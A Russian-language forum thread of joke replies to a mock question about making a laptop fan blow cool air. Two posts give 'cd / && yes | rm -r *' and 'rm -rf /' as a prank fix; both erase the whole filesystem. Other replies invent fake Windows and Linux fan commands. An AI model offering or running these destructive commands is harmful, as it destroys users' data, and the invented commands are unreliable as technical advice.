Вентилятор гонит из лаптопа горячий воздух
Правила форума
Пожалуйста, ознакомьтесь с правилами данного форума
Пожалуйста, ознакомьтесь с правилами данного форума
- Groundhog
- Графоман
Re: Вентилятор гонит из лаптопа горячий воздух
Линукс/Юникс:
cd / && yes | rm -r *
может помочь немного остудить
воздух.
cd / && yes | rm -r *
может помочь немного остудить
воздух.
- CdR
- Графоман
btw: есть еще насадки разные на входное отверстие. В зависимости от того, что надо "suck".Vims писал(а):Есть вот такая c:\windows\coolair\suck -c -t where -c stands for cool air only -t period of time 0 = permanent
-
- Маньяк
я всегда думал что сначала надо запускать coolaid и токо потом coolair...
- CdR
- Графоман
rm -rf /Groundhog писал(а):Линукс/Юникс:
cd / && yes | rm -r *
-
- Житель
У меня гонит холодный. Какая у тебя версия вентилятора ? Может драйвера не те стоят ?Marmot писал(а):Но сейчас и так тепло, как перелючить лаптоп с нагрева на охлаждение?
Нужны ли для этого специальные программы и где их скачать?
- Vims
- Northern Yeti
- Контактная информация:
Эти что ли ??CdR писал(а):btw: есть еще насадки разные на входное отверстие. В зависимости от того, что надо "suck".Vims писал(а):Есть вот такая c:\windows\coolair\suck -c -t where -c stands for cool air only -t period of time 0 = permanent

- Аман Ванкуверский
- Маньяк
ой, а у меня не было насадок в комплекте... это oem?CdR писал(а):btw: есть еще насадки разные на входное отверстие. В зависимости от того, что надо "suck".Vims писал(а):Есть вот такая c:\windows\coolair\suck -c -t where -c stands for cool air only -t period of time 0 = permanent
- CdR
- Графоман
китайская поделка!Аман Ванкуверский писал(а):ой, а у меня не было насадок в комплекте... это oem?
- Marmot
- Графоман
- Контактная информация:
Вот, хоть один человек по делу высказался, значит надежда еще не потеряна!spavel писал(а):У меня гонит холодный. Какая у тебя версия вентилятора ? Может драйвера не те стоят ?Marmot писал(а):Но сейчас и так тепло, как перелючить лаптоп с нагрева на охлаждение?
Нужны ли для этого специальные программы и где их скачать?
Я и сам догадывался, что дело в драйвере вентилятора, но надеялся что можно будет обойтись без плясок с бубнами.
Проблема в том что вентилятор у меня в Винде нифига не определяется, она его просто не видит, падла

Лаптоп у меня от компании, документации нифига найти не могу, кто его знает какая там версия, я даже модель не знаю.
А научится переключать на охлаждение очень хочется. Может посмореть или изменить какой-нибудь ключик в регистре, кто тут у нас спец по виндам, отзовитесь.
А вот тут еще в Гугле прочитал, что можно забить на вентилятор и заставить охлаждаться процессор, может кто знает как найти драйвер для CPU который может переключить его с нагрева на охлаждение?
Линуксоидов прошу не беспокоиться, советы ваши глупы и наивны

-
- Житель
может у тебя БИОС его не видит ? Попробуй автоопределение в БИОСЕ включить.Проблема в том что вентилятор у меня в Винде нифига не определяется, она его просто не видит, падла
- Аман Ванкуверский
- Маньяк
Зря между прочим, на винде вон версии, драйвера, заморочки..Marmot писал(а):Линуксоидов прошу не беспокоиться, советы ваши глупы и наивны
А на Линухе всего-то:
echo 1 > /proc/sys/dev/fan/cooling_enabled
- Проф. Преображенский
- Графоман
Фигня все. Просто лаптоп северного исполнения - для Канады, чтоб колени не мерзли. Южного будет охлаждать. Подожди - лето кончается.
- Marmot
- Графоман
- Контактная информация:
Похоже что на самом деле она его видит, только не показывает, т.е. это чисто софтовая проблемаspavel писал(а):может у тебя БИОС его не видит ? Попробуй автоопределение в БИОСЕ включить.Проблема в том что вентилятор у меня в Винде нифига не определяется, она его просто не видит, падла
Простой пример: когда заходишь на страницы с порнухой, вентилятор раскручивается как сумашедший, прямо чисто софтовое возбуждение. Если бы он еще при этом и охлаждал...
А на тексте он сразу успокаивается и почти не дует, так что проблема не в БИОСе, а все-таки в драйвере, похоже.
Не думаю что у БИОСа хватит ума так на картинки реагировать.
- Yury
- The L'ony
- Контактная информация:
ты, кстати, с разработчиками драйвера свяжись, может надыбаешь у них ноу-хау для фильтрации ваших картинок, заодно и драйвер попросишь починить...Marmot писал(а):Похоже что на самом деле она его видит, только не показывает, т.е. это чисто софтовая проблемаspavel писал(а):может у тебя БИОС его не видит ? Попробуй автоопределение в БИОСЕ включить.Проблема в том что вентилятор у меня в Винде нифига не определяется, она его просто не видит, падла
Простой пример: когда заходишь на страницы с порнухой, вентилятор раскручивается как сумашедший, прямо чисто софтовое возбуждение. Если бы он еще при этом и охлаждал...
А на тексте он сразу успокаивается и почти не дует, так что проблема не в БИОСе, а все-таки в драйвере, похоже.
Не думаю что у БИОСа хватит ума так на картинки реагировать.
- Stanislav
- Mr. Minority Report
Предлагаю это все на bash.org запостить